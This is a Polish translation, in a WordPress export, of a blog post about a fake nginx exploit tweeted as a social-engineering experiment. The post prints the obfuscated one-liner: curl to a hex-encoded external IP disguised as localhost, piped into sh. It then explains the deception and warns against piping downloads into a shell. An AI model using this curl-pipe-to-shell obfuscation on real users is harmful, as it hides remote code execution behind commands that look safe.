{"id":35126,"date":"2019-10-31T22:02:28","date_gmt":"2019-10-31T19:02:28","guid":{"rendered":"https:\/\/prohoster.info\/blog\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx\/"},"modified":"2019-10-31T22:02:28","modified_gmt":"2019-10-31T19:02:28","slug":"uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx","status":"publish","type":"post","link":"https:\/\/prohoster.info\/pl\/blog\/administrirovanie\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx","title":{"rendered":"Sukces eksperymentu spo\u0142ecznego z fa\u0142szywym exploitem dla nginx","gt_translate_keys":[{"key":"rendered","format":"text"}]},"content":{"rendered":"<p><i><b>Przyp. t\u0142um.<\/b>: <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/notdan\">Autor<\/a><\/noindex> oraz podj\u0119to pr\u00f3b\u0119 przeprowadzenia eksperymentu w\u015br\u00f3d os\u00f3b zainteresowanych bezpiecze\u0144stwem informacji. W tym celu przygotowano fa\u0142szywy exploit dla nieujawnionej luki w serwerze WWW i zamieszczono go na swoim Twitterze. Jego przypuszczenia dotycz\u0105ce tego, \u017ce natychmiast zostanie zdemaskowany przez specjalist\u00f3w, kt\u00f3rzy zobacz\u0105 oczywiste oszustwo w kodzie, nie tylko si\u0119 nie potwierdzi\u0142y\u2026 Przeciwnie, przewy\u017cszy\u0142y wszelkie oczekiwania: tweet zyska\u0142 ogromne wsparcie od licznych u\u017cytkownik\u00f3w, kt\u00f3rzy nie sprawdzili jego tre\u015bci.<\/i><\/p>\n<p><img decoding=\"async\" alt=\"Sukces eksperymentu spo\u0142ecznego z fa\u0142szywym exploitem dla nginx\" src=\"\/wp-content\/uploads\/2019\/06\/20ff08c6f541176c68ef2c689b989389.jpeg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\n<b>TL;DR: absolutnie nie u\u017cywaj potok\u00f3w plik\u00f3w w sh lub bash. To \u015bwietny spos\u00f3b na utrat\u0119 kontroli nad komputerem.<\/b><noindex><a rel=\"nofollow\" name=\"habracut\"><\/a><\/noindex><\/p>\n<p>Chc\u0119 podzieli\u0107 si\u0119 z wami kr\u00f3tk\u0105 histori\u0105 o \u017cartobliwym PoC-exploicie, kt\u00f3ry zosta\u0142 stworzony 31 maja. Powsta\u0142 szybko w odpowiedzi na wiadomo\u015b\u0107 od <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/alisaesage\">Alisa Esage Szewczenko<\/a><\/noindex>, cz\u0142onka <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/thezdi\">Zero Day Initiative<\/a><\/noindex> (ZDI), informuj\u0105cego, \u017ce wkr\u00f3tce ujawnione zostan\u0105 szczeg\u00f3\u0142y dotycz\u0105ce luki w NGINX, prowadz\u0105cej do RCE (zdalnego wykonania kodu). Poniewa\u017c NGINX jest podstaw\u0105 wielu stron internetowych, wiadomo\u015b\u0107 powinna by\u0142a wywo\u0142a\u0107 efekt bombowego wybuchu. Jednak z powodu op\u00f3\u017anie\u0144 w procesie 'odpowiedzialnego ujawniania' szczeg\u00f3\u0142y dotycz\u0105ce zdarzenia by\u0142y nieznane \u2014 taka jest standardowa procedura ZDI.<\/p>\n<p><img decoding=\"async\" alt=\"Sukces eksperymentu spo\u0142ecznego z fa\u0142szywym exploitem dla nginx\" src=\"\/wp-content\/uploads\/2019\/06\/fba47177ff2a2d05db7942f229e145b0.jpeg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<i><noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/alisaesage\/status\/1134400951043874816\">Tweet<\/a><\/noindex> o ujawnieniu luki w NGINX<\/i><\/p>\n<p>Ko\u0144cz\u0105c prac\u0119 nad now\u0105 technik\u0105 obfuskacji w curl, zacytowa\u0142em oryginalnego tweeta i 'wyciek\u0142em dzia\u0142aj\u0105cy PoC', sk\u0142adaj\u0105cy si\u0119 z jednej linijki kodu, rzekomo wykorzystuj\u0105cej odkryt\u0105 luk\u0119. Oczywi\u015bcie, by\u0142 to ca\u0142kowity nonsens. S\u0105dzi\u0142em, \u017ce natychmiast zostan\u0119 zdemaskowany, a w najlepszym razie dostan\u0119 kilka retweet\u00f3w (c\u00f3\u017c, niech b\u0119dzie).<\/p>\n<p><img decoding=\"async\" alt=\"Sukces eksperymentu spo\u0142ecznego z fa\u0142szywym exploitem dla nginx\" src=\"\/wp-content\/uploads\/2019\/06\/30c8394a4bd7a151828bc3459f18f2f6.jpeg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<i><noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/notdan\/status\/1134559331989434368\">Tweet<\/a><\/noindex> z fa\u0142szywym exploitem<\/i><\/p>\n<p>Jednak nie mog\u0142em sobie wyobrazi\u0107 tego, co wydarzy\u0142o si\u0119 p\u00f3\u017aniej. Popularno\u015b\u0107 mojego tweeta wzros\u0142a niesamowicie. Co dziwne, do tej pory (15:00, 1 czerwca) niewiele os\u00f3b zorientowa\u0142o si\u0119, \u017ce to oszustwo. Wielu retweetuje go bez sprawdzania (nie m\u00f3wi\u0105c ju\u017c o podziwianiu pi\u0119knej grafiki ASCII, kt\u00f3r\u0105 wy\u015bwietla).<\/p>\n<p><img decoding=\"async\" alt=\"Sukces eksperymentu spo\u0142ecznego z fa\u0142szywym exploitem dla nginx\" src=\"\/wp-content\/uploads\/2019\/06\/a22501843edc07cf0dc49b698b1048c2.jpeg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<i>Zobaczcie, jaka to pi\u0119kno\u015b\u0107!<\/i><\/p>\n<p>Chocia\u017c wszystkie te cykle i kolory s\u0105 wspania\u0142e, jasne jest, \u017ce aby je zobaczy\u0107, ludzie musieli uruchomi\u0107 kod na swoim komputerze. Na szcz\u0119\u015bcie przegl\u0105darki dzia\u0142aj\u0105 w podobny spos\u00f3b, a bior\u0105c pod uwag\u0119 fakt, \u017ce nie potrzebuj\u0119 problem\u00f3w z prawem, kod ukryty na mojej stronie po prostu wywo\u0142ywa\u0142 polecenia echo, nie pr\u00f3buj\u0105c ustawia\u0107 ani wykonywa\u0107 jakiegokolwiek dodatkowego kodu.<\/p>\n<p>Ma\u0142e dygresja: <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/netspooky\">netspooky<\/a><\/noindex>, <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/dnoiz1\">dnz<\/a><\/noindex>, ja i inni ch\u0142opcy z zespo\u0142u <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/thugcrowd\">Thugcrowd<\/a><\/noindex> ju\u017c od d\u0142u\u017cszego czasu bawimy si\u0119 r\u00f3\u017cnymi sposobami obfuskacji polece\u0144 curl, poniewa\u017c to jest zabawne... i jeste\u015bmy geekami. netspooky i dnz odkryli kilka nowych sposob\u00f3w, kt\u00f3re wydawa\u0142y mi si\u0119 niezwykle obiecuj\u0105ce. Do\u0142\u0105czy\u0142em do zabawy i postanowi\u0142em doda\u0107 konwersj\u0119 IP na format dziesi\u0119tny do zestawu sztuczek. Okaza\u0142o si\u0119, \u017ce IP mo\u017cna tak\u017ce konwertowa\u0107 na format szesnastkowy. Ponadto, curl i wi\u0119kszo\u015b\u0107 innych narz\u0119dzi NIX ch\u0119tnie \u201eprzyswaja\u201d szesnastkowe IP! W rezultacie trzeba by\u0142o po prostu stworzy\u0107 przekonuj\u0105c\u0105 i bezpiecznie wygl\u0105daj\u0105c\u0105 lini\u0119 polece\u0144. Ostatecznie zatrzyma\u0142em si\u0119 na tej:<\/p>\n<pre><code class=\"plaintext\">curl -gsS https:\/\/127.0.0.1-OR-VICTIM-SERVER:443\/..\/..\/..\/\/nginx-handler?\/usr\/lib\/nginx\/modules\/ngx_stream_module.so:127.0.0.1:80:\/bin\/sh&lt;&#039;protocol:TCP&#039; -O 0x0238f06a#PLToffset |sh; nc \/dev\/tcp\/localhost<\/code><\/pre>\n<p><\/p>\n<h2>Socjo-elektroniczne in\u017cynierowanie (S.E.E.) \u2014 to wi\u0119cej ni\u017c tylko phishing<\/h2>\n<p>\nBezpiecze\u0144stwo i znajomo\u015b\u0107 by\u0142y kluczowymi cz\u0119\u015bci\u0105 tego eksperymentu. My\u015bl\u0119, \u017ce to w\u0142a\u015bnie one przyczyni\u0142y si\u0119 do jego sukcesu. Linia polece\u0144 jednoznacznie sugerowa\u0142a bezpiecze\u0144stwo, odnosz\u0105c si\u0119 do \u201e127.0.0.1\u201d (wszystko znany localhost). Uwa\u017ca si\u0119, \u017ce localhost jest bezpieczny, a dane na nim nigdy nie opuszczaj\u0105 twojego komputera.<\/p>\n<p>Znajomo\u015b\u0107 by\u0142a drugim kluczowym sk\u0142adnikiem S.E.E. eksperymentu. Poniewa\u017c docelowa publiczno\u015b\u0107 sk\u0142ada\u0142a si\u0119 g\u0142\u00f3wnie z os\u00f3b zaznajomionych z podstawami bezpiecze\u0144stwa komputerowego, wa\u017cne by\u0142o stworzenie takiego kodu, aby jego elementy wydawa\u0142y si\u0119 znajome i wygodne (a zatem bezpieczne). Po\u017cyczanie element\u00f3w starych koncepcji exploit\u00f3w i ich \u0142\u0105czenie w nietypowy spos\u00f3b okaza\u0142o si\u0119 bardzo skuteczne.<\/p>\n<p>Poni\u017cej znajduje si\u0119 szczeg\u00f3\u0142owa analiza jednego wiersza. <i>Wszystko na tej li\u015bcie ma <b>charakter kosmetyczny<\/b>, a do jego rzeczywistego dzia\u0142ania praktycznie nic nie jest wymagane.<\/i><\/p>\n<p>Jakie komponenty s\u0105 naprawd\u0119 potrzebne? To s\u0105 <code>-gsS<\/code>, <code>-O 0x0238f06a<\/code>, <code>|sh<\/code> i sam serwer internetowy. Serwer nie zawiera\u0142 \u017cadnych z\u0142o\u015bliwych instrukcji, a jedynie przekazywa\u0142 grafik\u0119 ASCII za pomoc\u0105 polece\u0144 <code>echo<\/code> w skrypcie zawartym w <code>index.html<\/code>. Gdy u\u017cytkownik wpisywa\u0142 ci\u0105g z <code>|sh<\/code> w \u015brodku, <code>index.html<\/code> \u0142adowany by\u0142 i wykonywany. Na szcz\u0119\u015bcie stra\u017cnicy serwera internetowego nie mieli z\u0142ych zamiar\u00f3w.<\/p>\n<ul>\n<li> <code>..\/..\/..\/%00<\/code> \u2014 przedstawia wyj\u015bcie poza katalog;<\/li>\n<li> <code>ngx_stream_module.so<\/code> \u2014 \u015bcie\u017cka do losowego modu\u0142u NGINX;<\/li>\n<li> <code>\/bin\/sh%00&lt;'protocol:TCP'<\/code> \u2014 rzekomo uruchamiamy <code>\/bin\/sh<\/code> na docelowej maszynie i przekierowujemy wyj\u015bcie do kana\u0142u TCP;<\/li>\n<li> <code>-O 0x0238f06a#PLToffset<\/code> \u2014 sekretny sk\u0142adnik, dodatkowo <code>#PLToffset<\/code>, aby wygl\u0105da\u0107 jak przesuni\u0119cie pami\u0119ci, zawieraj\u0105ce si\u0119 w PLT w jaki\u015b spos\u00f3b;<\/li>\n<li> <code>|sh;<\/code> \u2014 jeszcze jeden wa\u017cny fragment. Musieli\u015bmy przekierowa\u0107 wyj\u015bcie do sh\/basha, aby wykona\u0107 kod pochodz\u0105cy z atakuj\u0105cego serwera internetowego, znajduj\u0105cego si\u0119 pod adresem <code>0x0238f06a<\/code> (<code>2.56.240.x<\/code>);<\/li>\n<li> <code>nc \/dev\/tcp\/localhost<\/code> \u2014 atrapka, w kt\u00f3rej netcat odnosi si\u0119 do <code>\/dev\/tcp\/localhost<\/code>, aby wszystko zn\u00f3w wygl\u0105da\u0142o bezpiecznie. W rzeczywisto\u015bci nic nie robi i jest wci\u0105gni\u0119ta do linii dla efektu.<\/li>\n<\/ul>\n<p>\nNa tym ko\u0144czy si\u0119 dekodowanie jednolinijkowego skryptu i om\u00f3wienie aspekt\u00f3w 'in\u017cynierii socjo-elektronowej' (przebieg\u0142ego phishingu).<\/p>\n<h2>Konfiguracja serwera internetowego i \u015brodki zaradcze<\/h2>\n<p>\nPoniewa\u017c zdecydowana wi\u0119kszo\u015b\u0107 moich subskrybent\u00f3w to specjali\u015bci w dziedzinie bezpiecze\u0144stwa IT\/hackerzy, postanowi\u0142em uczyni\u0107 serwer internetowy troch\u0119 bardziej odpornym na przejawy 'zainteresowania' z ich strony, tylko po to, aby mieli co robi\u0107 (a i konfiguracja by\u0142a ciekawa). Nie zamierzam tutaj wymienia\u0107 wszystkich pu\u0142apek, poniewa\u017c eksperyment wci\u0105\u017c trwa, ale oto kilka rzeczy, kt\u00f3re serwer robi:<\/p>\n<ul>\n<li> Aktywnie monitoruje pr\u00f3by rozpowszechniania w okre\u015blonych sieciach spo\u0142eczno\u015bciowych i podmienia r\u00f3\u017cne miniatury podgl\u0105du, aby zach\u0119ci\u0107 u\u017cytkownika do klikni\u0119cia linku.<\/li>\n<li> Przekierowuje Chrome\/Mozilla\/Safari\/itd. na promocyjny film Thugcrowd zamiast pokazywa\u0107 skrypt shell.<\/li>\n<li> Obserwuje EWIDENNE oznaki naruszenia bezpiecze\u0144stwa\/\u0142amania, po czym zaczyna przekierowywa\u0107 zapytania do serwer\u00f3w NSA (haha!).<\/li>\n<li> Instaluje trojana oraz rootkit BIOS na wszystkich komputerach, kt\u00f3rych u\u017cytkownicy odwiedzaj\u0105 host w zwyk\u0142ej przegl\u0105darce (\u017cart!).<\/li>\n<\/ul>\n<p>\n<img decoding=\"async\" alt=\"Sukces eksperymentu spo\u0142ecznego z fa\u0142szywym exploitem dla nginx\" src=\"\/wp-content\/uploads\/2019\/06\/8ea3f0c6e2e303bef6f9ba73370d6cf1.jpeg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<i>Ma\u0142y fragment antymera<\/i><\/p>\n<p>W tym przypadku moim jedynym celem by\u0142o zg\u0142\u0119bienie niekt\u00f3rych mo\u017cliwo\u015bci Apache \u2014 w szczeg\u00f3lno\u015bci fajnych regu\u0142 przekierowania zapyta\u0144 \u2014 i pomy\u015bla\u0142em: czemu nie?<\/p>\n<h2>Eksploit NGINX (prawdziwy!)<\/h2>\n<p>\n\u015aled\u017a nas na <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/alisaesage\">@alisaesage<\/a><\/noindex> na Twitterze i \u015bled\u017a niesamowit\u0105 prac\u0119 ZDI w usuwaniu rzeczywistych luk i mo\u017cliwo\u015bci eksploit\u00f3w w NGINX. Ich praca zawsze mnie fascynowa\u0142a i jestem wdzi\u0119czny Alisie za cierpliwo\u015b\u0107 wobec wszystkich wzmiank\u00f3w i powiadomie\u0144 wynikaj\u0105cych z mojego g\u0142upiego tweeta. Na szcz\u0119\u015bcie przyni\u00f3s\u0142 r\u00f3wnie\u017c pewne korzy\u015bci: pom\u00f3g\u0142 zwi\u0119kszy\u0107 \u015bwiadomo\u015b\u0107 o lukach w NGINX oraz o problemach spowodowanych nadu\u017cywaniem curl\u2019a.<br \/>\n<br \/>\u0179r\u00f3d\u0142o: <a content=\"nofollow\" rel=\"nofollow\" href=\"https:\/\/habr.com\/ru\/company\/flant\/blog\/454700\/\">habr.com<\/a><\/p>","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"excerpt":{"rendered":"<p>\u041f\u0440\u0438\u043c. \u043f\u0435\u0440\u0435\u0432.: \u0410\u0432\u0442\u043e\u0440 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b\u044c\u043d\u043e\u0439 \u0437\u0430\u043c\u0435\u0442\u043a\u0438, \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u043e\u0439 1 \u0438\u044e\u043d\u044f, \u0440\u0435\u0448\u0438\u043b \u043f\u0440\u043e\u0432\u0435\u0441\u0442\u0438 \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442 \u0432 \u0441\u0440\u0435\u0434\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u0443\u044e\u0449\u0438\u0445\u0441\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c\u044e. \u0414\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u043e\u043d \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u0438\u043b \u043f\u043e\u0434\u0434\u0435\u043b\u044c\u043d\u044b\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u043a \u043d\u0435\u0440\u0430\u0441\u043a\u0440\u044b\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0438 \u0440\u0430\u0437\u043c\u0435\u0441\u0442\u0438\u043b \u0435\u0433\u043e \u0432 \u0441\u0432\u043e\u0451\u043c \u0442\u0432\u0438\u0442\u0442\u0435\u0440\u0435. \u0415\u0433\u043e \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u2014 \u0431\u044b\u0442\u044c \u043c\u0433\u043d\u043e\u0432\u0435\u043d\u043d\u043e \u0440\u0430\u0437\u043e\u0431\u043b\u0430\u0447\u0451\u043d\u043d\u044b\u043c \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u0430\u043c\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0443\u0432\u0438\u0434\u044f\u0442 \u043e\u0447\u0435\u0432\u0438\u0434\u043d\u044b\u0439 \u043e\u0431\u043c\u0430\u043d \u0432 \u043a\u043e\u0434\u0435, \u2014 \u043d\u0435 \u043f\u0440\u043e\u0441\u0442\u043e \u043d\u0435 \u043e\u043f\u0440\u0430\u0432\u0434\u0430\u043b\u0438\u0441\u044c\u2026 \u041e\u043d\u0438 \u043f\u0440\u0435\u0432\u0437\u043e\u0448\u043b\u0438 \u0432\u0441\u0435 \u043e\u0436\u0438\u0434\u0430\u043d\u0438\u044f, [&hellip;]<\/p>\n","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"author":1,"featured_media":26410,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[688],"tags":[],"class_list":["post-35126","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-administrirovanie"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 5.0.1.1 - aioseo.com -->\n\t<meta name=\"description\" content=\"\u041f\u0440\u0438\u043c.\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"Yuri Gagarin\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/prohoster.info\/pl\/blog\/administrirovanie\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 5.0.1.1\" \/>\n\t\t<meta property=\"og:locale\" content=\"pl_PL\" \/>\n\t\t<meta property=\"og:site_name\" content=\"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"\ud83e\udd47\u0423\u0441\u043f\u0435\u0445 \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442\u0430 \u0441 \u043f\u043e\u0434\u0434\u0435\u043b\u044c\u043d\u044b\u043c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u043c \u0434\u043b\u044f nginx | ProHoster\" \/>\n\t\t<meta property=\"og:description\" content=\"\u041f\u0440\u0438\u043c.\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/prohoster.info\/pl\/blog\/administrirovanie\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:width\" content=\"350\" \/>\n\t\t<meta property=\"og:image:height\" content=\"350\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2019-10-31T19:02:28+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2019-10-31T19:02:28+00:00\" \/>\n\t\t<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"\ud83e\udd47Sukces spo\u0142ecznego eksperymentu z fa\u0142szywym exploitem dla Nginx | ProHoster","description":"Przyk\u0142.","canonical_url":"https:\/\/prohoster.info\/pl\/blog\/administrirovanie\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":null,"og:locale":"pl_PL","og:site_name":"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b","og:type":"article","og:title":"\ud83e\udd47\u0423\u0441\u043f\u0435\u0445 \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442\u0430 \u0441 \u043f\u043e\u0434\u0434\u0435\u043b\u044c\u043d\u044b\u043c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u043c \u0434\u043b\u044f nginx | ProHoster","og:description":"\u041f\u0440\u0438\u043c.","og:url":"https:\/\/prohoster.info\/pl\/blog\/administrirovanie\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx","og:image":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:secure_url":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:width":350,"og:image:height":350,"article:published_time":"2019-10-31T19:02:28+00:00","article:modified_time":"2019-10-31T19:02:28+00:00","article:publisher":"https:\/\/www.facebook.com\/prohoster","article:author":"https:\/\/www.facebook.com\/prohoster"},"aioseo_meta_data":{"post_id":"35126","title":null,"description":null,"keywords":null,"keyphrases":null,"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":null,"og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"","isEnabled":true},"graphs":[]},"schema_type":null,"schema_type_options":null,"pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":null,"robots_max_videopreview":null,"robots_max_imagepreview":"large","priority":null,"frequency":null,"local_seo":null,"seo_analyzer_scan_date":"2026-01-21 21:57:20","breadcrumb_settings":null,"limit_modified_date":false,"reviewed_by":null,"ai":null,"created":"2021-02-28 22:59:48","updated":"2026-01-21 21:57:20","focus_keyword":null,"additional_keywords":null,"truseo_locale":null},"gt_translate_keys":[{"key":"link","format":"url"}],"_links":{"self":[{"href":"https:\/\/prohoster.info\/pl\/wp-json\/wp\/v2\/posts\/35126","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/prohoster.info\/pl\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prohoster.info\/pl\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prohoster.info\/pl\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prohoster.info\/pl\/wp-json\/wp\/v2\/comments?post=35126"}],"version-history":[{"count":0,"href":"https:\/\/prohoster.info\/pl\/wp-json\/wp\/v2\/posts\/35126\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/prohoster.info\/pl\/wp-json\/wp\/v2\/media\/26410"}],"wp:attachment":[{"href":"https:\/\/prohoster.info\/pl\/wp-json\/wp\/v2\/media?parent=35126"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prohoster.info\/pl\/wp-json\/wp\/v2\/categories?post=35126"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prohoster.info\/pl\/wp-json\/wp\/v2\/tags?post=35126"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}